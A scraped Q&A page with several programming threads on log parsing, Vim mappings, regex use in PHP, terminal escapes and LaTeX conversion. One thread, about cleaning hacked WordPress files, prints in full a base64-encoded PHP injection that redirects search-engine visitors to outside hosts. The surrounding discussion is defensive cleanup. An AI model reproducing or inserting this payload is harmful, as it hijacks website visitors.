How to extract block of XML from a log file on Linux - php

I have a log file that looks like the following:
2010-05-12 12:23:45 Some sort of log entry
2010-05-12 01:45:12 Request XML: <RootTag>
<Element>Value</Element>
<Element>Another Value</Element>
</RootTag>
2010-05-12 01:45:32 Response XML: <ResponseRoot>
<Element>Value</Element>
</ResponseRoot>
2010-05-12 01:45:49 Another log entry
What I want to do is extract the Request and Response XML (and ultimately dump them into their own single files). I had a similar parser that used egrep but the XML was all on one line, not multiple ones like above.
The log files are also somewhat large, hitting 500-600 megs a log. Smaller logs I would read in via a PHP script and use regex matching, but the amount of memory required for such a large file would more than likely kill the script.
Is there an easy way using the built-in tools on a Linux box (CentOS in this case) to extract multiple lines or am I going to have to bite the bullet and use Perl or PHP to read in the entire file to extract it?

# Example usage:
# perl script.pl data.xml RootTag > RootTag.xml
use strict;
use warnings;
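my $tag = pop;    # last argument is the tag name; the remaining arguments are input files
while (<>) {
    # The flip-flop is true from the line containing <$tag> through the line
    # containing </$tag>; each s/// also trims any text outside the tag.
    if ( s/.*(<$tag>)/$1/ .. s/(<(\/)$tag>).*/$1/ ) {
        print;
        last if $2;    # $2 is set only by the closing-tag match, so stop after the first block
    }
}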
See the docs for details on the flip-flop operator.

Sounds like a job for sed (I was so tempted to say SuperSed ;-)
sed -n '/^<.\+>/H; /\(Request\|Response\) XML/{s/^.*</</;x;p}; ${x;p}' xmllog
where xmllog is your log file's name. You'll get a blank line at the beginning, but that can be filtered out with egrep '.+' or even just tail -n +2.
By way of explanation, sed is a little interpreter for programs that consist of a list of matching conditions and corresponding actions. sed runs through a file line by line (hence the name, "stream editor" -> "sed") and for each line, for each condition in the program that matches the text on the line, it applies the corresponding action. In this case:
/^<.\+>/
is a regular expression condition that matches any line which begins with < followed by any character (.) repeated one or more times (\+) followed by >, in other words any line that starts with an XML tag. The associated action is H which appends the line to a "hold buffer". The other condition is
/\(Request\|Response\) XML/
which, of course, is a regexp that matches either Request or Response followed by a space and then XML. The corresponding action is
{s/^.*</</;x;p}
which first does a substitution (s) of the beginning of the line (^) followed by any character (.) repeated any number of times (*) followed by <, with just <. Basically that gets rid of anything before the first XML tag on the line. Then it switches (x) the line just read with the "hold buffer" (which contains the XML of the previous log message) and prints (p) the stuff that was just swapped in from the hold buffer. Finally,
$
matches the last line of the input, and {x;p} again just swaps the contents of the hold buffer into the pattern space (the "print buffer") and then prints it.
You can alter the command to suit your needs, for example if you need something to delimit the different records, this'll put a blank line between them:
sed -n '/^<.\+>/H; /\(Request\|Response\) XML/{s/^.*</\n</;x;p}; ${x;p}' xmllog
(in that case, of course, don't use egrep to filter out the blank line at the beginning).

Your question implies you're not thinking right; if there's a way to do what you're asking in one language (there is) ... then you can do it in any language.
There's no reason to read the entire log into memory. You just read it line by line and extract the information you want. You just need to keep a state as to where you are (not in tag, inside RootTag, inside ResponseRoot, etc) and process the data as you wish.
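The line-by-line, keep-a-state approach described above can be sketched as follows. This is a minimal Python sketch rather than any poster's code. It assumes every log entry starts with a timestamp shaped like the ones in the sample, and that the XML is introduced by "Request XML:" or "Response XML:". The names extract_xml_blocks and SAMPLE are made up for illustration.

```python
import io
import re

# Assumed marker format, taken from the sample log in the question.
START = re.compile(r"(Request|Response) XML: (<.*)$")
# Assumption: every new log entry begins with a timestamp like 2010-05-12 01:45:12.
TIMESTAMP = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} ")

SAMPLE = """2010-05-12 12:23:45 Some sort of log entry
2010-05-12 01:45:12 Request XML: <RootTag>
<Element>Value</Element>
<Element>Another Value</Element>
</RootTag>
2010-05-12 01:45:32 Response XML: <ResponseRoot>
<Element>Value</Element>
</ResponseRoot>
2010-05-12 01:45:49 Another log entry
"""


def extract_xml_blocks(lines):
    """Yield (kind, xml_text) pairs while holding only one block in memory."""
    kind, buffer = None, []
    for line in lines:
        line = line.rstrip("\n")
        if TIMESTAMP.match(line):
            # A timestamped line ends whatever block was being collected.
            if kind is not None:
                yield kind, "\n".join(buffer)
                kind, buffer = None, []
            match = START.search(line)
            if match:
                kind, buffer = match.group(1), [match.group(2)]
        elif kind is not None:
            # Continuation line of the current XML block.
            buffer.append(line)
    if kind is not None:
        yield kind, "\n".join(buffer)


if __name__ == "__main__":
    for kind, xml in extract_xml_blocks(io.StringIO(SAMPLE)):
        print(f"--- {kind} ---")
        print(xml)
```

For a real log, pass an open file object instead of the StringIO; iterating over a file reads it one line at a time, so a 500-600 MB log never has to fit in memory.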

Related

Deleting base64 Eval Junk with (osx) terminal

Trying to clean up after a slew of php injections -- every php function in about six sites worth of WordPress templates is full of junk.
I've got everything off the server, onto a local machine, and I'm hoping there should be a good way to delete all of the enormous code strings with terminal.
Of which I know approximately nothing.
http://devilsworkshop.org/remove-evalbase64decode-malicious-code-grep-sed-commands-files-linux-server/ had good instructions for doing a clear on the server, but substituting my path/to/folder doesn't seem to be working in terminal.
Feeling I'm close, but, blind as I am to the ways of the terminal, that doesn't seem that comforting.
Based on the above, here's what I've got -- any help would be so amazingly appreciated.
grep -lr --include=*.php "eval(base64_decode" "/Users/Moxie/Desktop/portfolio-content" | xargs sed -i.bak 's/<?php eval(base64_decode[^;]*;/<?php\n/g'
UPDATED
derobert -- thanks a million for helping with this --
basically, the space after every <?php before the actual function had this inserted into it:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3LnN0bHAuNHB1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
The characters change with each one, so a simple find and replace won't work (which was, I'm pretty sure, the point).
Here is the code that worked for me.
I downloaded all the files to my local machine and started working on a solution. Here is what I ended up with (combined with what I googled):
#!/bin/bash
FILES=$(find ./ -name "*.php" -type f)
for f in $FILES
do
echo "Processing $f file LONG STRING"
sed -i 's#eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly93a3BiLjI1dS5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));##g' $f
echo "Processing $f file SMALL STRING"
sed -i 's#eval(base64_decode.*));##g' $f
done
Save it somewhere as mybash.sh (from your favourite text editor), then:
$ chmod +x mybash.sh   # give the script execute permission
$ ./mybash.sh
I used the first, LONG STRING command because that pattern is always the same. Here is the explanation for the above code:
s# - start of the substitute command {# is the delimiter, used the same way as / in sed}
eval(base64_decode.*)); - the pattern to match, a regular expression {. matches any single character, * matches the preceding element zero or more times}
# - second appearance of the delimiter; nothing follows it, which means the matched string {eval(base64_decode.*));} is replaced WITH {''}
#g - closing delimiter plus the g flag, which replaces every match on a line
So, someone got access to write to arbitrary files on your server. I assume you've cleaned up the exploit that let them in already.
The problem is, while the eval(base64_decode stuff is obvious, and has to go, the intruder could have put other stuff in there. Who knows, maybe he deleted a mysql_real_escape_string somewhere, to leave you vulnerable to future SQL injection? Or a htmlspecialchars, leaving you vulnerable to JavaScript injection? Could have done anything. Might not even be PHP; you sure no JavaScript was added? Or embeds?
The best way to be sure is to compare to a known-good copy. You do have version control and backups, right?
Otherwise, you can indeed use perl -pi -e to do a substitute on that PHP code, though matching it might be difficult, depending. This might work (work on a copy!), and adjust spacing in the regexp as needed:
perl -pi -e 's!<\?php eval\(base64_decode\(.*?\)\) \?>!!g' *.php
but really, you should review each file by hand, to confirm there are no other exploits present. Even if your last known-good copies are somewhat old, you can review the diffs.
edit:
Ok, so it sounds like you don't want to nuke the whole PHP block, just the eval line:
perl -pi -e 's!eval\(base64_decode\(.*?\)\);!!g' *.php
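You may want to add a \n before the first ! if there is additionally a newline to kill, etc. If the base64 actually has newlines in it, then you will need to add s after the g, and also run perl with -0777 so that each file is read in one piece; with plain -p the pattern only ever sees one line at a time.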
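The same substitution can be tried on a string before letting it loose on files. The following is a minimal Python sketch, not the method used in either answer: it assumes the injected call always has the shape eval(base64_decode("...")); with a quoted payload made only of base64 characters, and the name strip_injected_eval is hypothetical.

```python
import re

# Assumed shape of the injection: eval(base64_decode("<base64>"));
# Restricting the payload to base64 characters (plus whitespace) keeps the match
# from running past the end of the injected call, unlike a greedy ".*".
INJECTED = re.compile(r"""eval\(base64_decode\((["'])[A-Za-z0-9+/=\s]*\1\)\);""")


def strip_injected_eval(source):
    """Return (cleaned_source, number_of_removals) for one file's contents."""
    return INJECTED.subn("", source)


if __name__ == "__main__":
    infected = '<?php eval(base64_decode("DQplcnJvcl9yZXBv=="));\nget_header(); ?>'
    cleaned, count = strip_injected_eval(infected)
    print(count, "removal(s)")
    print(cleaned)
```

Returning the removal count makes it easy to list which files were touched, so they can still be reviewed by hand as recommended above. Work on a copy and keep the originals.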

Setup a shortcut to replace easily selected strings in VIM

I have a lot of php/html files with many strings that should be internationalized with gettext.
Therefore, I have to go through each file, spot the "message" strings and replace each one by
<?= _("<my string>") ?>
I use vim and would like to set up a shortcut (map) to do it easily in insert mode (with Ctrl-R, for instance).
Do you know how to achieve that ?
I would use Tim Pope's wonderful surround plugin to accomplish this.
Add the following to your ~/.vim/after/ftplugin/php.vim file:
let b:surround_{char2nr('_')} = "<?= _(\"\r\") ?>"
Now you can select some text in visual mode and then surround it, e.g. vitS_
If you are in insert mode you can surround text via <c-s>_ and your cursor will be placed between the double quotes.
As a bonus, if you want to delete the surrounding <?= _("<text here>") ?> and leave only <text here>, you can add the following to your ~/.vim/after/ftplugin/php.vim as well:
nmap <buffer> <silent> ds_ ds<dt(%df?[(xds"
Tim Pope has many great plugins; I highly suggest you take a look at some of them.
For more help see:
:h surround
:h surround-customizing
:h after-directory
:h curly-braces-names
:h b:var
My guess is that you want the original message to actually be the input to the _() function, do you not?
The best thing I can think for you to do is to use macros. If I were doing this I would probably record a macro @1 for one-word "messages" (that need to be replaced), @2 for two-word messages, @3 for three-word messages and so on. Then I could just skim or search through the documents and type @1 at the start of any one-word message like one
to replace it with <?= _("one") ?>. I would use @2 on a message like two words to transform it to <?= _("two words") ?> and so forth.
To create/record the macro for one-word messages, @1, type these keys, preferably at the start of a one-word message:
q1i<?= _("<Esc>eli") ?><Esc>q
q 1 i < ? = Space _ ( " Esc e l i " ) Space ? > Esc q
The macros for more words can be created very similarly; just add additional e's for more words. So for @2, type this:
q2i<?= _("<Esc>eeli") ?><Esc>q
q 2 i < ? = Space _ ( " Esc e e l i " ) Space ? > Esc q
In the case of really long messages, I would probably use an open and close macro. The open one would place <?= _(" wherever I had my cursor and the close one would put ") ?> wherever I had my cursor.
If you want to surround these strings manually and your message does not contain ", then you can (after putting the cursor somewhere inside the message) do the following once:
qaf"a)<Esc>2F"i_(<Esc>q
(press the real Escape key for <Esc>). Then, after putting the cursor on the next message, repeat it with
@a
(if you don’t like a, replace it with another lowercase Latin letter here and above after q). If you still want to have a mapping:
:nnoremap <C-r> f"a)<Esc>2F"i_(<Esc>
This time <Esc> is typed literally as the five characters <, E, s, c, >.
The first approach uses macros, which are handy because defining a mapping takes more typing. Depending on the 'viminfo' option they may even be saved across Vim sessions, but you should not rely on this, so if you want something persistent, put the mapping in your vimrc.
Update: If you don’t have <? "message" ?>, which I assumed, but instead have <tag>message</tag>, you can do the following:
:nnoremap <C-r> f<i") ?><Esc>F>a<? _("<Esc>
Note that this time the message should not contain < or >.
Regex
Vim is very capable of handling tasks like this with ease. Without a before and after example it's difficult to give you a precise solution, but I'll make a hypothetical one to demonstrate some of vim's power. Say you wanted to change any text inside a <span> tag to be executed by a PHP function. I might have a span tag like this:
<span>I need this text and all other span tags run through PHP!</span>
Probably the easiest way to get the job done is using regex. For example:
:%s/<span>\([^<]*\)<\/span>/<?= _("\1") ?>/g
This finds all span tags in the document and replaces them appropriately. You can even run this on multiple files (see :help bufdo). However, regex can be difficult for some people at first and many haven't taken the time to learn it well. Another option might look like this:
CTRL-R
/<span><cr>f>lct<<?= _("<C-r>"") ?><esc>
Step by step
/<span><cr> - search for opening span tags
f>l - move cursor to the character after the opening span tag
ct< - change the text until the next < character
<?= _("<C-r>"") ?> - put in what we want. The <C-r>" (as you referred to) will put in the contents of our unnamed register ", which in this case is the text we executed ct< on a minute ago.
<esc> - return to normal mode
Macro this
This might be useful to use as a macro. If so, just do the exact same thing with a macro around it...
qq/<span><cr>f>lct<<?= _("<C-r>"") ?><esc>q
Now you can execute @q to do the same thing to the next <span> tag. After you've used @q once you can also use @@ or even 100@q to do it 100 times.

Apply a list of regular expressions in PHP

I have a long list of regular expressions in an ignore.txt, and another long list in an include.txt file. What would be the quickest way to apply these using PHP against data contained in a sample.html file such that any matches found in include are captured, but then anything matching in ignore.txt is excluded?
If your include.txt and ignore.txt files are set up so that they contain only regular expressions, one expression per line, you can use PHP's file() function. That will load each file into an array where each individual line is an element (pass the FILE_IGNORE_NEW_LINES flag so the line endings are stripped). You can use file_get_contents() to load the sample.html file in as a string.
preg_match() or preg_match_all() do not actually take arrays as input, like preg_replace() does. You will need to loop over your array of expressions using something like foreach and applying an individual call to one of the matching functions to get your results.
I think preg_match_all() will suit your needs best, because it sounds like you're wanting to pull all of the matches out of the entire file, not just the first one. Once you have your full list of matches, then you'd apply your filter using the data from ignore.txt in a similar manner.
The quickest way would be to let the shell do the job:
$result = `cat sample.html | egrep -f include.txt | egrep -vf ignore.txt`;
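The loop-over-patterns approach from the first answer can be sketched like this. It is a minimal Python sketch under stated assumptions, not PHP and not either poster's code: patterns use Python's re syntax with one expression per line, a match is dropped when any ignore pattern matches inside it, and the names load_patterns and filter_matches are hypothetical.

```python
import re


def load_patterns(lines):
    """Compile one regular expression per non-empty line."""
    return [re.compile(line.strip()) for line in lines if line.strip()]


def filter_matches(text, include, ignore):
    """Collect every include match, then drop those that any ignore pattern matches."""
    found = []
    for pattern in include:
        found.extend(m.group(0) for m in pattern.finditer(text))
    return [hit for hit in found if not any(p.search(hit) for p in ignore)]


if __name__ == "__main__":
    include = load_patterns(["<a [^>]*>", "<img [^>]*>"])
    ignore = load_patterns(["tracker"])
    html = '<a href="x"><img src="tracker.gif"><img src="logo.png">'
    for hit in filter_matches(html, include, ignore):
        print(hit)
```

With real files, load_patterns(open("include.txt")) works as-is because a file object iterates over its lines. Note that this filters individual matches, whereas the egrep pipeline above filters whole lines, so the two can give different results.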

multi-line terminal progress indicator?

In a terminal, if I'm outputting a one-line progress indicator of some sort, in-place, \r would do the trick:
while (1) { echo "progress indication\r"; }
However, I have a progress indicator that really should be multi-line. As \r only returns to the start of the current line, I want something that can move up a couple of lines. Is there a control character/function that allows me to step back lines in the terminal?
Edit: in case I wasn't completely clear, I wish to have something roughly the opposite of \v, the vertical tab, which moves the terminal cursor down a line.
There is no control character to go back onto the previous line, but depending on the TERM= type an ANSI escape sequence might do the trick. This one moves the cursor up two lines:
echo -e "\033[2A"
Here's a list that might be more helpful: http://en.wikipedia.org/wiki/ANSI_escape_code and for usage in the shell http://www.linuxselfhelp.com/howtos/Bash-Prompt/Bash-Prompt-HOWTO-6.html
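Put together, a multi-line indicator only needs "cursor up N lines" before each redraw. The following is a minimal Python sketch assuming an ANSI-capable terminal and a block whose line count stays constant between redraws; the function name render and the two status lines are made up for illustration.

```python
import sys
import time

CURSOR_UP = "\033[{n}A"   # CSI n A: move the cursor up n lines
CLEAR_LINE = "\033[2K"    # CSI 2 K: erase the whole current line


def render(lines, first=False):
    """Return the string that draws (or redraws in place) a block of lines."""
    out = []
    if not first:
        # Jump back to the first line of the previously drawn block.
        out.append(CURSOR_UP.format(n=len(lines)))
    for line in lines:
        # Clear each line before writing so shorter text leaves no leftovers.
        out.append("\r" + CLEAR_LINE + line + "\n")
    return "".join(out)


if __name__ == "__main__":
    for step in range(11):
        status = [f"download: {step * 10:3d}%", f"unpack:   {step * 5:3d}%"]
        sys.stdout.write(render(status, first=(step == 0)))
        sys.stdout.flush()
        time.sleep(0.05)
```

Building the whole frame as one string and writing it in a single call keeps flicker down. When output is redirected to a file the escape sequences end up in it, so a real script would probably check sys.stdout.isatty() first.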

Replace all "\" characters which are *not* inside "<code>" tags

First things first: Neither this, this, this nor this answered my question. So I'll open a new one.
Please read
Okay okay. I know that regexes are not the way to parse general HTML. Please take note that the created documents are written using a limited, controlled HTML subset. And people writing the docs know what they're doing. They are all IT professionals!
Given the controlled syntax it is possible to parse the documents I have here using regexes.
I am not trying to download arbitrary documents from the web and parse them!
And if the parsing does fail, the document is edited, so it'll parse. The problem I am addressing here is more general than that (i.e. not replace patterns inside two other patterns).
A little bit of background (you can skip this...)
In our office we are supposed to "pretty print" our documentation. Hence why some came up with putting it all into Word documents. So far we're thankfully not quite there yet. And, if I get this done, we might not need to.
The current state (... and this)
The main part of the docs is stored in a TikiWiki database. I've created a daft PHP script which converts the documents from HTML (via LaTeX) to PDF. One of the must-have features of the selected wiki system was a WYSIWYG editor, which, as expected, leaves us with documents with a less than formal DOM.
Consequently, I am transliterating the document using "simple" regexes. It all works (mostly) fine so far, but I encountered one problem I haven't figured out on my own yet.
The problem
Some special characters need to be replaced by LaTeX markup. For example, the \ character should be replaced by $\backslash$ (unless someone knows another solution?).
Except while in a verbatim block!
I do replace <code> tags with verbatim sections. But if this code block contains backslashes (as is the case for Windows folder names), the script still replaces these backslashes.
I reckon I could solve this using negative LookBehinds and/or LookAheads. But my attempts did not work.
Granted, I would be better off with a real parser. In fact, it is something on my "in-brain-roadmap", but it is currently out of the scope. The script works well enough for our limited knowledge domain. Creating a parser would require me to start pretty much from scratch.
My attempt
Example Input
The Hello \ World document is located in:
<code>C:\documents\hello_world.txt</code>
Expected output
The Hello $\backslash$ World document is located in:
\begin{verbatim}C:\documents\hello_world.txt\end{verbatim}
This is the best I could come up with so far:
<?php
$patterns = array(
"special_chars2" => array( '/(?<!<code[^>]*>.*)\\\\[^$](?!.*<\/code>)/U', '$\\backslash$'),
);
foreach( $patterns as $name => $p ){
$tex_input = preg_replace( $p[0], $p[1], $tex_input );
}
?>
Note that this is only an excerpt, and the [^$] is another LaTeX requirement.
Another attempt which seemed to work:
<?php
$patterns = array(
"special_chars2" => array( '/\\\\[^$](?!.*<\/code>)/U', '$\\backslash$'),
);
foreach( $patterns as $name => $p ){
$tex_input = preg_replace( $p[0], $p[1], $tex_input );
}
?>
... in other words: leaving out the negative lookbehind.
But this looks more error-prone than with both lookbehind and lookahead.
A related question
As you may have noticed, the pattern is ungreedy (/.../U). So will this match only as little possible inside a <code> block? Considering the look-arounds?
If it were me, I would try to find an HTML parser and do it with that.
Another option is to split the string into <code>.*?</code> chunks and the parts in between, update only the in-between parts, and then recombine everything.
$x="The Hello \ World document is located in:\n<br>
<code>C:\documents\hello_world.txt</code>";
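// Split on <code> blocks; the capture group keeps them in the result at odd indexes.
$r = preg_split("/(<code>.*?<\/code>)/", $x, -1, PREG_SPLIT_DELIM_CAPTURE);
// Even indexes hold the text outside <code>, so only those get the replacement.
for ($i = 0; $i < count($r); $i += 2) {
    $r[$i] = str_replace("\\", "$\\backslash$", $r[$i]);
}
$x = implode($r);
echo $x;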
Here are the results:
The Hello $\backslash$ World document is located in:
C:\documents\hello_world.txt
Sorry if my approach is not suitable for you.
I reckon I could solve this using negative LookBehinds and/or LookAheads.
You reckon wrong. Regular expressions are not a replacement for a parser.
I would suggest that you pipe the HTML through htmltidy, then read it with a DOM parser and then transform the DOM to your target output format. Is there anything preventing you from taking this route?
Parser FTW, ok. But if you can't use a parser, and you can be certain that <code> tags are never nested, you could try the following:
1. Find <code>.*?</code> sections of your file (you will probably need to turn on dot-matches-newlines mode).
2. Replace all backslashes inside that section with something unique like #?#?#?#
3. Replace the section found in 1 with that new section
4. Replace all backslashes with $\backslash$
5. Replace all <code> with \begin{verbatim} and all </code> with \end{verbatim}
6. Replace #?#?#?# with \
FYI, regexes in PHP don't support variable-length lookbehind. So that makes this conditional matching between two boundaries difficult.
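The placeholder steps listed above can be sketched as follows. This is a minimal Python sketch of that technique, not the asker's PHP pipeline: it assumes <code> tags carry no attributes and are never nested, and it ignores the extra [^$] requirement mentioned in the question. The name to_latex is hypothetical.

```python
import re

PLACEHOLDER = "#?#?#?#"  # assumed never to occur in the real input
CODE_BLOCK = re.compile(r"<code>.*?</code>", re.DOTALL)  # DOTALL: "." also matches newlines


def to_latex(html):
    if PLACEHOLDER in html:
        raise ValueError("placeholder already present in input")
    # Protect the backslashes inside every <code> section.
    text = CODE_BLOCK.sub(lambda m: m.group(0).replace("\\", PLACEHOLDER), html)
    # Every backslash still left is outside <code>, so it gets the LaTeX markup.
    text = text.replace("\\", "$\\backslash$")
    # Turn the tags into a verbatim environment.
    text = text.replace("<code>", "\\begin{verbatim}").replace("</code>", "\\end{verbatim}")
    # Restore the protected backslashes.
    return text.replace(PLACEHOLDER, "\\")


if __name__ == "__main__":
    sample = "The Hello \\ World document is located in:\n<code>C:\\documents\\hello_world.txt</code>"
    print(to_latex(sample))
```

The order matters: the verbatim markup is inserted only after the global backslash replacement, otherwise the backslashes in \begin and \end would be rewritten too.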
Pandoc? Pandoc converts between a bunch of formats. You can also concatenate a bunch of files together and then convert them. Maybe a few shell scripts combined with your PHP scraping scripts?
With your "expected input" and the command pandoc -o text.tex test.html the output is:
The Hello \textbackslash{} World document is located in:
\verb!C:\documents\hello_world.txt!
pandoc can read from stdin, write to stdout or pipe right into a file.
Provided that your <code> blocks are not nested, this regex would find a backslash after ^ start-of-string or </code> with no <code> in between.
((?:^|</code>)(?:(?!<code>).)+?)\\
 |            |                 |
 |            |                 \-- backslash
 |            \-- least amount of anything not followed by <code>
 \-- start-of-string or </code>
And replace it with:
$1$\backslash$
You'd have to run this regex in "singleline" mode, so . matches newlines. You'd also have to run it multiple times; specifying global replacement is not enough. Each replacement will only replace the first eligible backslash after start-of-string or </code>.
Write a parser based on an HTML or XML parser like DOMDocument. Traverse the parsed DOM and replace the \ on every text node that is not a descendent of a code node with $\backslash$ and every node that is a code node with \begin{verbatim} … \end{verbatim}.
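A parser-based version could look roughly like this. It is a sketch in Python using the standard library's event-based html.parser instead of a DOM tree such as DOMDocument, so it is a swapped-in technique rather than the one named above. It assumes well-formed input, drops comments and doctype declarations, and the names LatexBackslashes and convert are hypothetical.

```python
from html.parser import HTMLParser


class LatexBackslashes(HTMLParser):
    """Re-emit the document, rewriting backslashes only outside <code>."""

    def __init__(self):
        # convert_charrefs=False keeps entities such as &amp; untouched.
        super().__init__(convert_charrefs=False)
        self.out = []
        self.code_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag == "code":
            self.code_depth += 1
            self.out.append("\\begin{verbatim}")
        else:
            self.out.append(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):
        # Self-closing tags such as <br/> are passed through unchanged.
        self.out.append(self.get_starttag_text())

    def handle_endtag(self, tag):
        if tag == "code":
            self.code_depth -= 1
            self.out.append("\\end{verbatim}")
        else:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.code_depth == 0:
            data = data.replace("\\", "$\\backslash$")
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")


def convert(html):
    parser = LatexBackslashes()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    print(convert("The Hello \\ World <b>doc</b>\n<code>C:\\documents\\hello_world.txt</code>"))
```

Tracking a depth counter rather than a boolean means text stays protected until the outermost </code> closes, even if a nested <code> slips in.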
